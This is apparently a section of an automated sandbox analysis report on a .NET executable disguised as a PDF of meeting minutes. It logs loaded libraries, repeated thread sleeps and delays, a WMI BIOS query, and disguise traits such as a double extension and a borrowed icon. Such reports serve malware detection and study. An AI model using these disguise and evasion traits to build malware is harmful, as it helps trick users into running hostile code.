Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdfJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSCJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeSection loaded: gpapi.dllJump to behavior
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: 0x9DB05A09 [Sat Nov 1 03:24:57 2053 UTC]

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
Source: Possible double extension: pdf.exeStatic PE information: Minutes_of_15th_Session_of_PSC.pdf.exe
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 5240000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeWindow / User API: threadDelayed 5057Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeWindow / User API: threadDelayed 2088Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeWindow / User API: threadDelayed 8592Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeWindow / User API: threadDelayed 1230Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 6288Thread sleep count: 5057 > 30Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 6288Thread sleep count: 2088 > 30Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 3636Thread sleep count: 8592 > 30Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 7128Thread sleep count: 1230 > 30Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep count: 34 > 30Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -31359464925306218s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69628s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69503s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69378s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69253s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69121s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -69019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68769s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68644s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68519s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68394s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68269s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68144s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -68019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67769s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67644s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67519s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67394s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67269s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67144s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -67019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66769s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66644s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66519s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66394s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66269s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66144s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -66019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65769s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65644s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65519s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65394s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65269s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65144s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -65019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64769s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64644s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64519s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64394s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64269s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64144s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -64019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -63894s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe TID: 4412Thread sleep time: -63769s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69628Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69503Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69378Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69253Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69121Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 69019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68769Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68644Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68519Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68394Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68269Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68144Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 68019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67769Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67644Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67519Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67394Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67269Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67144Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 67019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66769Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66644Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66519Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66394Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66269Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66144Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 66019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65769Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65644Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65519Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65394Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65269Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65144Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 65019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64769Jump to behavior
